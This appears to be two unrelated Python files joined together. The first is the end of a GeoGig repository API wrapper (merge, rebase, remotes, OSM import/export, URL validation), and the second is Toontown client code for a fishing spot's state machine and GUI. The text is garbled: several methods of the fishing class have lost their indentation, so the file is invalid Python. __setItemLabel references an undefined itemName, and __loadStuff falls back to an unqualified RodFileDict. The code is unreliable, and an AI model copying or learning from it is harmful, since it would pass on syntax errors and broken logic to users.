        The attributes are passed in a dict with attribute names as keys and attribute values as values.
        There must be one and only one geometry attribute, with a Geometry object.
        It will overwrite any feature in the same path, so this can be used to add a new feature or to
        modify an existing one
        '''
        self.connector.insertfeatures({path : attributes})
    def insertfeatures(self, features):
        '''
        Inserts a set of features into the working tree.
        Features are passed in a dict with paths as keys and attributes as values
        The attributes for each feature are passed in a dict with attribute names as keys and attribute values as values.
        There must be one an only one geometry attribute, with a Geometry object.
        It will overwrite any feature in the same path, so this can be used to add new features or to
        modify existing ones
        '''
        self.connector.insertfeatures(features)
    def removefeatures(self, paths):
        '''Removes the passed features paths from the working tree and index, so they are no longer versioned'''
        self.connector.removepaths(paths)
    def removetrees(self, paths):
        '''Removes the passed tree paths from the working tree and index, so they are no longer versioned'''
        self.connector.removepaths(paths, True)
    def commonancestor(self, refa, refb):
        '''
        Returns the common ancestor of the two passed references as a commitish object
        Returns None if no common ancestor exists for the passed references
        '''
        return self.connector.commonancestor(refa, refb)
    def merge(self, ref, nocommit = False, message = None):
        '''Merges the passed ref into the current branch'''
        self.connector.merge(_resolveref(ref), nocommit, message)
        self.cleancache()
    def rebase(self, ref):
        '''Rebases the current branch using the passed ref'''
        self.connector.rebase(_resolveref(ref))
        self.cleancache()
    def abort(self):
        '''
        Abort a merge or rebase operation, if it was stopped due to conflicts
        Does nothing if the repo is not in a conflicted state
        '''
        self.connector.abort()
    def continue_(self):
        '''
        Continues a rebase operation that was stopped due to conflicts
        Raises a GeoGigException if the repo is not clean and cannot continue the operation
        Does nothing if the repo is not in a conflicted state caused by a rebase operation
        '''
        self.connector.continue_()
    def cherrypick(self, ref):
        '''Cherrypicks a commit into the current branch'''
        self.connector.cherrypick(_resolveref(ref))
        self.cleancache()
    @property
    def remotes(self):
        '''Returns a dict with remote names as keys and remote urls as values'''
        return self.connector.remotes()
    def addremote(self, name, url, username, password):
        '''Adds a new remote'''
        self.connector.addremote(name, url, username, password)
    def removeremote(self, name):
        '''Removes a remote'''
        self.connector.removeremote(name)
    def ismerging(self):
        '''Returns true if the repo is in the middle of a merge stopped due to conflicts'''
        return self.connector.ismerging()
    def isrebasing(self):
        '''Returns true if the repo is in the middle of a rebase stopped due to conflicts'''
        return self.connector.isrebasing()
    def downloadosm(self, osmurl, bbox, mappingorfile = None):
        '''Downloads from a OSM server using the overpass API.
        The bbox parameter defines the extent of features to download.
        Accepts a mapping object or a string with the path to a mapping file'''
        mappingfile = None
        if mappingorfile is not None:
            mappingfile = self._mapping(mappingorfile)
        self.connector.downloadosm(osmurl, bbox, mappingfile)
        self.cleancache()
    def _mapping(self, mappingorfile):
        # Accepts either a path string (returned as-is) or a mapping object,
        # which is serialised to a temp file whose name is returned
        if isinstance(mappingorfile, basestring):
            return mappingorfile
        else:
            # NOTE(review): f.close() runs in both the try body and the
            # finally block (second close is a harmless no-op), and f is
            # unbound if NamedTemporaryFile itself raises — TODO confirm
            try:
                f = tempfile.NamedTemporaryFile(delete = False)
                f.write(mappingorfile.asjson())
                f.close()
                return f.name
            finally:
                f.close()
    def importosm(self, osmfile, add = False, mappingorfile = None):
        '''
        Imports an osm file.
        Accepts a mapping object or a string with the path to a mapping file to define an import mapping
        '''
        mappingfile = None
        if mappingorfile is not None:
            mappingfile = self._mapping(mappingorfile)
        self.connector.importosm(osmfile, add, mappingfile)
    def exportosm(self, osmfile, ref = None, bbox = None):
        '''
        Exports the OSM data in the repository to an OSM XML file
        A bounding box can be passed to be used as a filter.
        It is passed as a tuple of 4 elements containing the boundary coordinates in the form (S, W, N, E)
        '''
        self.connector.exportosm(osmfile, _resolveref(ref), bbox)
    def exportosmchangeset(self, osmfile, changesetid = None, refa = None, refb = None):
        '''
        Exports the difference between the osm data in two commits as a osm changeset.
        An alternative changeset id can be used to replace negative ids if they exist
        '''
        self.connector.exportosmchangeset(osmfile, changesetid, _resolveref(refa), _resolveref(refb))
    def maposm(self, mappingorfile):
        '''Applies a mapping to the OSM data in the repo.
        The mapping can be passed as a file path to a mapping file, or as a OSMMapping object'''
        mappingfile = self._mapping(mappingorfile)
        self.connector.maposm(mappingfile)
    def show(self, ref):
        '''Returns the description of an element, as printed by the GeoGig show command'''
        return self.connector.show(_resolveref(ref))
    def config(self, param, value, global_ = False):
        '''Configures a geogig parameter with a the passed value'''
        return self.connector.config(param, value, global_)
    def getconfig(self, param):
        '''Returns the current value for a given parameter'''
        return self.connector.getconfig(param)
    def pull(self, remote = geogig.ORIGIN, branch = None, rebase = False):
        '''
        Pulls from the specified remote and specified branch.
        If no branch is provided, it will use the name of the current branch, unless the repo is headless.
        In that case, and exception will be raised
        If rebase == True, it will do a rebase instead of a merge
        '''
        if branch == None and self.isdetached():
            raise GeoGigException("HEAD is detached. Cannot pull")
        branch = branch or self.head.ref
        self.connector.pull(remote, branch, rebase)
        self.cleancache()
    def push(self, remote, branch = None, all = False):
        '''
        Pushes to the specified remote and specified branch.
        If no branch is provided, it will use the name of the current branch, unless the repo is headless.
        In that case, and exception will be raised.
        if all == True, it will push all branches and ignore the branch.
        '''
        if branch is None and self.isdetached():
            raise GeoGigException("HEAD is detached. Cannot push")
        branch = branch or self.head.ref
        return self.connector.push(remote, branch, all)
    def init(self, initParams = None):
        '''
        Inits the repository.
        Init params is a dict of paramName : paramValues to be supplied to the init command
        '''
        self.connector.init(initParams)
def isremoteurl(url):
    '''Returns a truthy value when url points to a remote http(s) server.'''
    if url is None:
        return False
    ##This URL validation pattern has been taken from the Django source code
    pattern = re.compile(
        r'^https?://' # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|' # domain...
        r'localhost|' # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
        r'(?::\d+)?' # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    return pattern.search(url)
| |
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from direct.directtools.DirectGeometry import LineNodePath
from direct.distributed import DistributedObject
from direct.directnotify import DirectNotifyGlobal
from toontown.toonbase import ToontownGlobals
from toontown.fishing import FishGlobals
from toontown.shtiker import FishPage
from toontown.toonbase import TTLocalizer
from toontown.quest import Quests
from direct.actor import Actor
from direct.showutil import Rope
import math
from direct.task.Task import Task
import random
import random
from toontown.fishing import FishingTargetGlobals
from toontown.fishing import FishBase
from toontown.fishing import FishPanel
from toontown.effects import Ripples
from toontown.toontowngui import TTDialog
from toontown.toonbase import ToontownTimer
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from toontown.hood import ZoneUtil
from toontown.toontowngui import TeaserPanel
class DistributedFishingSpot(DistributedObject.DistributedObject):
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedFishingSpot')
    # NOTE(review): presumably cast tuning limits (max initial speed and max
    # rod swing angle) — their use is not visible in this chunk; confirm
    vZeroMax = 25.0
    angleMax = 30.0
    def __init__(self, cr):
        """Initialise client-side state; guarded so repeat calls are no-ops."""
        if hasattr(self, 'fishInit'):
            return
        self.fishInit = 1
        DistributedObject.DistributedObject.__init__(self, cr)
        # Debounce bookkeeping for duplicate collision-sphere entries
        self.lastAvId = 0
        self.lastFrame = 0
        # Occupying avatar state
        self.avId = 0
        self.av = None
        self.placedAvatar = 0
        self.localToonFishing = 0
        # Scene graph and collision handles (built in generateInit)
        self.nodePath = None
        self.collSphere = None
        self.collNode = None
        self.collNodePath = None
        self.castTrack = None
        self.pond = None
        self.guiTrack = None
        # GUI state
        self.madeGui = 0
        self.castGui = None
        self.itemGui = None
        # Fishing props: rod, line, bob, effects
        self.pole = None
        self.line = None
        self.poleNode = []
        self.ptop = None
        self.bob = None
        self.bobBobTask = None
        self.splashSounds = None
        self.ripples = None
        self.line = None
        self.lineSphere = None
        # Cast state
        self.power = 0.0
        self.startAngleNP = 0
        self.firstCast = 1
        self.fishPanel = None
        # Client-side state machine mirroring the spot's lifecycle
        self.fsm = ClassicFSM.ClassicFSM('DistributedFishingSpot', [State.State('off', self.enterOff, self.exitOff, ['waiting',
         'distCasting',
         'fishing',
         'reward',
         'leaving']),
         State.State('waiting', self.enterWaiting, self.exitWaiting, ['localAdjusting',
         'distCasting',
         'leaving',
         'sellFish']),
         State.State('localAdjusting', self.enterLocalAdjusting, self.exitLocalAdjusting, ['localCasting', 'leaving']),
         State.State('localCasting', self.enterLocalCasting, self.exitLocalCasting, ['localAdjusting', 'fishing', 'leaving']),
         State.State('distCasting', self.enterDistCasting, self.exitDistCasting, ['fishing', 'leaving', 'reward']),
         State.State('fishing', self.enterFishing, self.exitFishing, ['localAdjusting',
         'distCasting',
         'waitForAI',
         'reward',
         'leaving']),
         State.State('sellFish', self.enterSellFish, self.exitSellFish, ['waiting', 'leaving']),
         State.State('waitForAI', self.enterWaitForAI, self.exitWaitForAI, ['reward', 'leaving']),
         State.State('reward', self.enterReward, self.exitReward, ['localAdjusting',
         'distCasting',
         'leaving',
         'sellFish']),
         State.State('leaving', self.enterLeaving, self.exitLeaving, [])], 'off', 'off')
        self.fsm.enterInitialState()
        return
def disable(self):
self.ignore(self.uniqueName('enterFishingSpotSphere'))
self.setOccupied(0)
self.avId = 0
if self.castTrack != None:
if self.castTrack.isPlaying():
self.castTrack.finish()
self.castTrack = None
if self.guiTrack != None:
if self.guiTrack.isPlaying():
self.guiTrack.finish()
self.guiTrack = None
self.__hideBob()
self.nodePath.detachNode()
self.__unmakeGui()
self.pond.stopCheckingTargets()
self.pond = None
for event in self.getAllAccepting():
if event.startswith('generate-'):
self.ignore(event)
DistributedObject.DistributedObject.disable(self)
return
    def delete(self):
        """Permanently destroy client-side resources (idempotent via fishDeleted)."""
        if hasattr(self, 'fishDeleted'):
            return
        self.fishDeleted = 1
        del self.pond
        del self.fsm
        if self.nodePath:
            self.nodePath.removeNode()
            del self.nodePath
        DistributedObject.DistributedObject.delete(self)
        # Ripple effect is destroyed last, after the base class teardown
        if self.ripples:
            self.ripples.destroy()
    def generateInit(self):
        """Build the scene-graph nodes and trigger sphere for this spot."""
        DistributedObject.DistributedObject.generateInit(self)
        self.nodePath = NodePath(self.uniqueName('FishingSpot'))
        # Child node whose heading is managed separately from the spot
        # (kept in sync in setPosHpr, reset in setOccupied)
        self.angleNP = self.nodePath.attachNewNode(self.uniqueName('FishingSpotAngleNP'))
        self.collSphere = CollisionSphere(0, 0, 0, self.getSphereRadius())
        # Intangible: the sphere only fires enter events, it does not block
        self.collSphere.setTangible(0)
        self.collNode = CollisionNode(self.uniqueName('FishingSpotSphere'))
        self.collNode.setCollideMask(ToontownGlobals.WallBitmask)
        self.collNode.addSolid(self.collSphere)
        self.collNodePath = self.nodePath.attachNewNode(self.collNode)
        # NOTE(review): presumably the bob's rest position relative to the
        # spot — usage not visible in this chunk; confirm
        self.bobStartPos = Point3(0.0, 3.0, 8.5)
    def generate(self):
        """Object is appearing on the client; no extra setup beyond the base class."""
        DistributedObject.DistributedObject.generate(self)
    def announceGenerate(self):
        """All required fields have arrived: attach to the scene and listen for toons."""
        DistributedObject.DistributedObject.announceGenerate(self)
        self.nodePath.reparentTo(self.getParentNodePath())
        # Start reacting to toons walking into the trigger sphere
        self.accept(self.uniqueName('enterFishingSpotSphere'), self.__handleEnterSphere)
def setPondDoId(self, pondDoId):
self.pondDoId = pondDoId
if pondDoId in self.cr.doId2do:
self.setPond(self.cr.doId2do[pondDoId])
else:
self.acceptOnce('generate-%d' % pondDoId, self.setPond)
    def setPond(self, pond):
        """Cache the pond, its area, and that area's water level for later use."""
        self.pond = pond
        self.area = self.pond.getArea()
        self.waterLevel = FishingTargetGlobals.getWaterLevel(self.area)
def allowedToEnter(self):
if hasattr(base, 'ttAccess') and base.ttAccess and base.ttAccess.canAccess():
return True
return False
    def handleOkTeaser(self):
        """Dismiss the paid-feature teaser dialog and return the toon to walk."""
        self.dialog.destroy()
        del self.dialog
        place = base.cr.playGame.getPlace()
        if place:
            place.fsm.request('walk')
    def __handleEnterSphere(self, collEntry):
        """Collision handler: ask the AI for the spot, or show the teaser panel.

        Suppresses a re-trigger on the frame right after the same avatar
        left the spot (lastAvId/lastFrame debounce).
        """
        if self.allowedToEnter():
            if base.localAvatar.doId == self.lastAvId and globalClock.getFrameCount() <= self.lastFrame + 1:
                self.notify.debug('Ignoring duplicate entry for avatar.')
                return
            # Only request while alive and not already fishing.
            if base.localAvatar.hp > 0 and base.cr.playGame.getPlace().fsm.getCurrentState().getName() != 'fishing':
                self.cr.playGame.getPlace().detectedFishingCollision()
                self.d_requestEnter()
        else:
            place = base.cr.playGame.getPlace()
            if place:
                place.fsm.request('stopped')
            self.dialog = TeaserPanel.TeaserPanel(pageName='fishing', doneFunc=self.handleOkTeaser)
    def d_requestEnter(self):
        """Ask the AI server for permission to occupy this spot."""
        self.sendUpdate('requestEnter', [])
    def rejectEnter(self):
        """AI denied entry (spot taken); put the toon back into walk mode."""
        self.cr.playGame.getPlace().setState('walk')
    def d_requestExit(self):
        """Tell the AI server the local toon is leaving the spot."""
        self.sendUpdate('requestExit', [])
    def d_doCast(self, power, heading):
        """Send the local cast (power in [0,1], heading in degrees) to the AI."""
        self.sendUpdate('doCast', [power, heading])
def getSphereRadius(self):
return 1.5
    def getParentNodePath(self):
        """Node the spot is parented under; the top-level render node here."""
        return render
    def setPosHpr(self, x, y, z, h, p, r):
        """Distributed field: place the spot and align the casting heading node."""
        self.nodePath.setPosHpr(x, y, z, h, p, r)
        self.angleNP.setH(render, self.nodePath.getH(render))
    def setOccupied(self, avId):
        """Distributed field: avId now occupies this spot (0 = vacated).

        Handles three phases in order: retry if the avatar object has not
        generated locally yet, clean up any previous occupant, then install
        the new one.  Statement order matters throughout (reparenting,
        FSM final state, GUI cell toggling).
        """
        if avId and avId not in self.cr.doId2do:
            # Avatar not generated yet: re-run shortly after it appears.
            def tryAgain(av):
                def reposition(task):
                    self.setOccupied(avId)
                    return task.done
                taskMgr.doMethodLater(0.1, reposition, self.uniqueName('reposition'))
            self.acceptOnce('generate-%d' % avId, tryAgain)
            return
        if self.av != None:
            # Release the previous occupant.
            if not self.av.isEmpty():
                self.__dropPole()
                self.av.loop('neutral')
                self.av.setParent(ToontownGlobals.SPRender)
                self.av.startSmooth()
            self.ignore(self.av.uniqueName('disable'))
            self.__hideBob()
            self.fsm.requestFinalState()
            self.__removePole()
            self.av = None
            self.placedAvatar = 0
            self.angleNP.setH(render, self.nodePath.getH(render))
        self.__hideLine()
        wasLocalToon = self.localToonFishing
        # Debounce data used by __handleEnterSphere.
        self.lastAvId = self.avId
        self.lastFrame = globalClock.getFrameCount()
        self.avId = avId
        self.localToonFishing = 0
        if self.avId == 0:
            self.collSphere.setTangible(0)
        else:
            # Occupied spots become solid so other toons cannot enter.
            self.collSphere.setTangible(1)
        if self.avId == base.localAvatar.doId:
            base.setCellsActive(base.bottomCells, 0)
            self.localToonFishing = 1
            if base.wantBingo:
                self.pond.setLocalToonSpot(self)
            self.av = self.cr.doId2do.get(self.avId)
            self.__loadStuff()
            self.placedAvatar = 0
            self.firstCast = 1
            self.acceptOnce(self.av.uniqueName('disable'), self.__avatarGone)
            self.av.stopSmooth()
            self.av.wrtReparentTo(self.angleNP)
            self.av.setAnimState('neutral', 1.0)
            self.createCastTrack()
        if wasLocalToon and not self.localToonFishing:
            # Local toon just gave up the spot: restore the normal HUD.
            self.__hideCastGui()
            if base.wantBingo:
                self.pond.setLocalToonSpot()
            base.setCellsActive([base.bottomCells[1], base.bottomCells[2]], 1)
            base.setCellsActive(base.rightCells, 1)
            place = base.cr.playGame.getPlace()
            if place:
                place.setState('walk')
        return
    def __avatarGone(self):
        """Occupying avatar's object was disabled; treat the spot as vacated."""
        self.setOccupied(0)
    def setMovie(self, mode, code, itemDesc1, itemDesc2, itemDesc3, power, h):
        """Distributed field: drive this spot's FSM from an AI movie event.

        The itemDesc values are mode-dependent (reward payload for
        PullInMovie, unused otherwise); CastMovie is only replayed for
        remote toons because the local toon already animated its own cast.
        """
        if self.av == None:
            return
        if mode == FishGlobals.NoMovie:
            pass
        elif mode == FishGlobals.EnterMovie:
            self.fsm.request('waiting')
        elif mode == FishGlobals.ExitMovie:
            self.fsm.request('leaving')
        elif mode == FishGlobals.CastMovie:
            if not self.localToonFishing:
                self.fsm.request('distCasting', [power, h])
        elif mode == FishGlobals.PullInMovie:
            self.fsm.request('reward', [code,
             itemDesc1,
             itemDesc2,
             itemDesc3])
        return
    def getStareAtNodeAndOffset(self):
        """Node (and zero offset) other toons should look at for this spot."""
        return (self.nodePath, Point3())
def __loadStuff(self):
rodId = self.av.getFishingRod()
rodPath = FishGlobals.RodFileDict.get(rodId)
if not rodPath:
self.notify.warning('Rod id: %s model not found' % rodId)
rodPath = RodFileDict[0]
self.pole = Actor.Actor()
self.pole.loadModel(rodPath)
self.pole.loadAnims({'cast': 'phase_4/models/props/fishing-pole-chan'})
self.pole.pose('cast', 0)
self.ptop = self.pole.find('**/joint_attachBill')
if self.line == None:
self.line = Rope.Rope(self.uniqueName('Line'))
self.line.setColor(1, 1, 1, 0.4)
self.line.setTransparency(1)
self.lineSphere = BoundingSphere(Point3(-0.6, -2, -5), 5.5)
if self.bob == None:
self.bob = loader.loadModel('phase_4/models/props/fishing_bob')
self.bob.setScale(1.5)
self.ripples = Ripples.Ripples(self.nodePath)
self.ripples.setScale(0.4)
self.ripples.hide()
if self.splashSounds == None:
self.splashSounds = (base.loadSfx('phase_4/audio/sfx/TT_splash1.ogg'), base.loadSfx('phase_4/audio/sfx/TT_splash2.ogg'))
return
    def __placeAvatar(self):
        """Snap the avatar to the spot origin and hand it the pole (once)."""
        if not self.placedAvatar:
            self.placedAvatar = 1
            self.__holdPole()
            self.av.setPosHpr(0, 0, 0, 0, 0, 0)
    def __holdPole(self):
        """Instance the pole into each of the avatar's right-hand joints."""
        if self.poleNode != []:
            self.__dropPole()
        np = NodePath('pole-holder')
        hands = self.av.getRightHands()
        for h in hands:
            # One instance per hand joint (LOD variants share the pole model).
            self.poleNode.append(np.instanceTo(h))
        self.pole.reparentTo(self.poleNode[0])
    def __dropPole(self):
        """Detach the pole (and its hand instances) without destroying it."""
        self.__hideBob()
        self.__hideLine()
        if self.pole != None:
            self.pole.clearMat()
            self.pole.detachNode()
        for pn in self.poleNode:
            pn.removeNode()
        self.poleNode = []
        return
    def __removePole(self):
        """Fully destroy the pole actor and its attachment nodes."""
        self.pole.cleanup()
        self.pole.removeNode()
        self.poleNode = []
        self.ptop.removeNode()
        self.pole = None
        self.ptop = None
        return
    def __showLineWaiting(self):
        """Drape a slack 4-point line from the pole tip down to the bob."""
        self.line.setup(4, ((None, (0, 0, 0)),
         (None, (0, -2, -4)),
         (self.bob, (0, -1, 0)),
         (self.bob, (0, 0, 0))))
        self.line.ropeNode.setBounds(self.lineSphere)
        self.line.reparentTo(self.ptop)
        return
    def __showLineCasting(self):
        """Show a taut 2-point line from the pole tip to the flying bob."""
        self.line.setup(2, ((None, (0, 0, 0)), (self.bob, (0, 0, 0))))
        self.line.ropeNode.setBounds(self.lineSphere)
        self.line.reparentTo(self.ptop)
        return
    def __showLineReeling(self):
        """Show a taut 2-point line while reeling in (same shape as casting)."""
        self.line.setup(2, ((None, (0, 0, 0)), (self.bob, (0, 0, 0))))
        self.line.ropeNode.setBounds(self.lineSphere)
        self.line.reparentTo(self.ptop)
        return
    def __hideLine(self):
        """Detach the fishing line from the scene, if it exists."""
        if self.line:
            self.line.detachNode()
    def __showBobFloat(self):
        """Land the bob on the water: splash sound, ripples and bobbing task."""
        self.__hideBob()
        self.bob.reparentTo(self.angleNP)
        self.ripples.reparentTo(self.angleNP)
        self.ripples.setPos(self.bob.getPos())
        # Slightly above the water so the ripple effect is not z-fighting.
        self.ripples.setZ(self.waterLevel + 0.025)
        self.ripples.play()
        splashSound = random.choice(self.splashSounds)
        base.playSfx(splashSound, volume=0.8, node=self.bob)
        self.bobBobTask = taskMgr.add(self.__doBobBob, self.taskName('bob'))
    def __hideBob(self):
        """Hide the bob, stop its bobbing task and stop the ripple effect."""
        if self.bob:
            self.bob.detachNode()
        if self.bobBobTask:
            taskMgr.remove(self.bobBobTask)
            self.bobBobTask = None
        if self.ripples:
            self.ripples.stop()
            self.ripples.detachNode()
        return
    def __doBobBob(self, task):
        """Per-frame task: sinusoidally bob the float around the water level."""
        z = math.sin(task.time * 1.8) * 0.08
        self.bob.setZ(self.waterLevel + z)
        return Task.cont
    def __userExit(self, event = None):
        """Exit-button/dialog callback: play the leaving movie and tell the AI."""
        if self.localToonFishing:
            self.fsm.request('leaving')
            self.d_requestExit()
    def __sellFish(self, result = None):
        """Sell-fish dialog callback: OK sells the tank, anything else leaves."""
        if self.localToonFishing:
            if result == DGG.DIALOG_OK:
                self.sendUpdate('sellFish', [])
                # Disable the buttons until the AI responds (sellFishComplete).
                for button in self.sellFishDialog.buttonList:
                    button['state'] = DGG.DISABLED
            else:
                self.fsm.request('leaving')
                self.d_requestExit()
    def __sellFishConfirm(self, result = None):
        """Trophy-confirmation dialog callback: return to waiting, no re-anim."""
        if self.localToonFishing:
            self.fsm.request('waiting', [False])
    def __showCastGui(self):
        """Show the casting HUD for the local toon and wire up its callbacks.

        Also hides any DistributedTarget GUI that would overlap, applies the
        bingo layout when bingo night is active, and shows the first-time
        how-to panel for brand-new anglers.
        """
        self.__hideCastGui()
        self.__makeGui()
        self.castButton.show()
        self.arrow.hide()
        self.exitButton.show()
        self.timer.show()
        self.__updateFishTankGui()
        self.castGui.reparentTo(aspect2d)
        self.castButton['state'] = DGG.NORMAL
        self.jar['text'] = str(self.av.getMoney())
        self.accept(localAvatar.uniqueName('moneyChange'), self.__moneyChange)
        self.accept(localAvatar.uniqueName('fishTankChange'), self.__updateFishTankGui)
        target = base.cr.doFind('DistributedTarget')
        if target:
            target.hideGui()
        if base.wantBingo:
            self.__setBingoCastGui()

        # Press starts aiming — unless the tank is full and selling is
        # allowed, in which case the button doubles as a "sell" trigger.
        def requestLocalAdjusting(mouseEvent):
            if self.av.isFishTankFull() and self.__allowSellFish():
                self.fsm.request('sellFish')
            else:
                self.fsm.request('localAdjusting')

        # Release performs the cast (unless the press went to sellFish).
        def requestLocalCasting(mouseEvent):
            if not (self.av.isFishTankFull() and self.__allowSellFish()):
                self.fsm.request('localCasting')
        self.castButton.bind(DGG.B1PRESS, requestLocalAdjusting)
        self.castButton.bind(DGG.B3PRESS, requestLocalAdjusting)
        self.castButton.bind(DGG.B1RELEASE, requestLocalCasting)
        self.castButton.bind(DGG.B3RELEASE, requestLocalCasting)
        if self.firstCast and len(self.av.fishCollection) == 0 and len(self.av.fishTank) == 0:
            self.__showHowTo(TTLocalizer.FishingHowToFirstTime)
        elif base.wantBingo and self.pond.hasPondBingoManager() and not self.av.bFishBingoTutorialDone:
            pass
            #todo: fix b_setFishBingoTutorialDone crash
            #self.__showHowTo(TTLocalizer.FishBingoHelpMain)
            #self.av.b_setFishBingoTutorialDone(True)
    def __moneyChange(self, money):
        """moneyChange event handler: refresh the jellybean-jar readout."""
        self.jar['text'] = str(money)
    def __initCastGui(self):
        """Start the inactivity countdown shown on the casting HUD."""
        self.timer.countdown(FishGlobals.CastTimeout)
    def __showQuestItem(self, itemId):
        """Show the reward panel with a fished-up quest item (package icon)."""
        self.__makeGui()
        itemName = Quests.getItemName(itemId)
        self.itemLabel['text'] = itemName
        self.itemGui.reparentTo(aspect2d)
        self.itemPackage.show()
        self.itemJellybean.hide()
        self.itemBoot.hide()
    def __showBootItem(self):
        """Show the reward panel for the old-boot consolation catch."""
        self.__makeGui()
        itemName = TTLocalizer.FishingBootItem
        self.itemLabel['text'] = itemName
        self.itemGui.reparentTo(aspect2d)
        self.itemBoot.show()
        self.itemJellybean.hide()
        self.itemPackage.hide()
def __setItemLabel(self):
if self.pond.hasPondBingoManager():
self.itemLabel['text'] = str(itemName + '\n\n' + 'BINGO WILDCARD')
else:
self.itemLabel['text'] = itemName
    def __showJellybeanItem(self, amount):
        """Show the reward panel for a jellybean catch and refresh the jar."""
        self.__makeGui()
        itemName = TTLocalizer.FishingJellybeanItem % amount
        self.itemLabel['text'] = itemName
        self.itemGui.reparentTo(aspect2d)
        self.jar['text'] = str(self.av.getMoney())
        self.itemJellybean.show()
        self.itemBoot.hide()
        self.itemPackage.hide()
    def __showFishItem(self, code, fish):
        """Show the caught-fish panel (code distinguishes new entry/record)."""
        self.fishPanel = FishPanel.FishPanel(fish)
        self.__setFishItemPos()
        self.fishPanel.setSwimBounds(-0.3, 0.3, -0.235, 0.25)
        self.fishPanel.setSwimColor(1.0, 1.0, 0.74901, 1.0)
        self.fishPanel.load()
        self.fishPanel.show(code)
        self.__updateFishTankGui()
def __setFishItemPos(self):
if base.wantBingo:
if self.pond.hasPondBingoManager():
self.fishPanel.setPos(0.65, 0, 0.4)
else:
self.fishPanel.setPos(0, 0, 0.5)
else:
self.fishPanel.setPos(0, 0, 0.5)
    def __updateFishTankGui(self):
        """Refresh the bucket label with current/max fish-tank counts."""
        fishTank = self.av.getFishTank()
        lenFishTank = len(fishTank)
        maxFishTank = self.av.getMaxFishTank()
        self.bucket['text'] = '%s/%s' % (lenFishTank, maxFishTank)
    def __showFailureReason(self, code):
        """Show the failure dialog with a message for the given failure code."""
        self.__makeGui()
        reason = ''
        if code == FishGlobals.OverTankLimit:
            reason = TTLocalizer.FishingOverTankLimit
        self.failureDialog.setMessage(reason)
        self.failureDialog.show()
    def __showSellFishDialog(self):
        """Show the yes/no offer-to-sell-fish dialog."""
        self.__makeGui()
        self.sellFishDialog.show()
    def __hideSellFishDialog(self):
        """Hide the offer-to-sell-fish dialog."""
        self.__makeGui()
        self.sellFishDialog.hide()
    def __showSellFishConfirmDialog(self, numFishCaught):
        """Show the trophy-progress acknowledgement after selling fish."""
        self.__makeGui()
        msg = TTLocalizer.STOREOWNER_TROPHY % (numFishCaught, FishGlobals.getTotalNumFish())
        self.sellFishConfirmDialog.setMessage(msg)
        self.sellFishConfirmDialog.show()
    def __hideSellFishConfirmDialog(self):
        """Hide the trophy-progress acknowledgement dialog."""
        self.__makeGui()
        self.sellFishConfirmDialog.hide()
    def __showBroke(self):
        """Show the out-of-jellybeans dialog and disable casting."""
        self.__makeGui()
        self.brokeDialog.show()
        self.castButton['state'] = DGG.DISABLED
    def __showHowTo(self, message):
        """Show the how-to-fish help dialog with the given message."""
        self.__makeGui()
        self.howToDialog.setMessage(message)
        self.howToDialog.show()
    def __hideHowTo(self, event = None):
        """Hide the how-to-fish help dialog (also its OK-button callback)."""
        self.__makeGui()
        self.howToDialog.hide()
    def __showFishTankFull(self):
        """Show the tank-full failure dialog and disable casting."""
        self.__makeGui()
        self.__showFailureReason(FishGlobals.OverTankLimit)
        self.castButton['state'] = DGG.DISABLED
    def __hideCastGui(self):
        """Hide the casting HUD, unbind its buttons, and restore target GUI."""
        target = base.cr.doFind('DistributedTarget')
        if target:
            target.showGui()
        if self.madeGui:
            self.timer.hide()
            self.castGui.detachNode()
            self.itemGui.detachNode()
            self.failureDialog.hide()
            self.sellFishDialog.hide()
            self.sellFishConfirmDialog.hide()
            self.brokeDialog.hide()
            self.howToDialog.hide()
            self.castButton.unbind(DGG.B1PRESS)
            self.castButton.unbind(DGG.B3PRESS)
            self.castButton.unbind(DGG.B1RELEASE)
            self.castButton.unbind(DGG.B3RELEASE)
            self.ignore(localAvatar.uniqueName('moneyChange'))
            self.ignore(localAvatar.uniqueName('fishTankChange'))
    def __itemGuiClose(self):
        """Close-button callback: detach the reward-item panel."""
        self.itemGui.detachNode()
    def __makeGui(self):
        """Lazily build the whole fishing GUI (HUD, reward panel, dialogs).

        Idempotent: guarded by self.madeGui so every __show* helper can call
        it unconditionally.  All widgets are created hidden; __showCastGui
        and friends reveal the pieces they need.
        """
        if base.config.GetBool('want-qa-regression', 0):
            self.notify.info('QA-REGRESSION: FISHING: ZoneId: %s' % self.pond.getArea())
        if self.madeGui:
            return
        self.timer = ToontownTimer.ToontownTimer()
        self.timer.posInTopRightCorner()
        self.timer.hide()
        self.castGui = loader.loadModel('phase_4/models/gui/fishingGui')
        self.castGui.setBin("background", 10)
        self.castGui.setScale(0.67)
        self.castGui.setPos(0, 1, 0)
        # Flatten the pieces we manipulate directly under the GUI root.
        for nodeName in ('bucket', 'jar', 'display_bucket', 'display_jar'):
            self.castGui.find('**/' + nodeName).reparentTo(self.castGui)
        self.exitButton = DirectButton(parent=self.castGui, relief=None, text=('', TTLocalizer.FishingExit, TTLocalizer.FishingExit), text_align=TextNode.ACenter, text_scale=0.1, text_fg=Vec4(1, 1, 1, 1), text_shadow=Vec4(0, 0, 0, 1), text_pos=(0.0, -0.12), pos=(1.75*(4./3.), 0, -1.33), textMayChange=0, image=(self.castGui.find('**/exit_buttonUp'), self.castGui.find('**/exit_buttonDown'), self.castGui.find('**/exit_buttonRollover')), command=self.__userExit)
        self.castGui.find('**/exitButton').removeNode()
        self.castButton = DirectButton(parent=self.castGui, relief=None, text=TTLocalizer.FishingCast, text_align=TextNode.ACenter, text_scale=(3, 3 * 0.75, 3 * 0.75), text_fg=Vec4(1, 1, 1, 1), text_shadow=Vec4(0, 0, 0, 1), text_pos=(0, -4), image=self.castGui.find('**/castButton'), image0_color=(1, 0, 0, 1), image1_color=(0, 1, 0, 1), image2_color=(1, 1, 0, 1), image3_color=(0.8, 0.5, 0.5, 1), pos=(0, -0.05, -0.666), scale=(0.036, 1, 0.048))
        self.castGui.find('**/castButton').removeNode()
        # Aiming arrow: tip/tail scaled separately to show cast power.
        self.arrow = self.castGui.find('**/arrow')
        self.arrowTip = self.arrow.find('**/arrowTip')
        self.arrowTail = self.arrow.find('**/arrowTail')
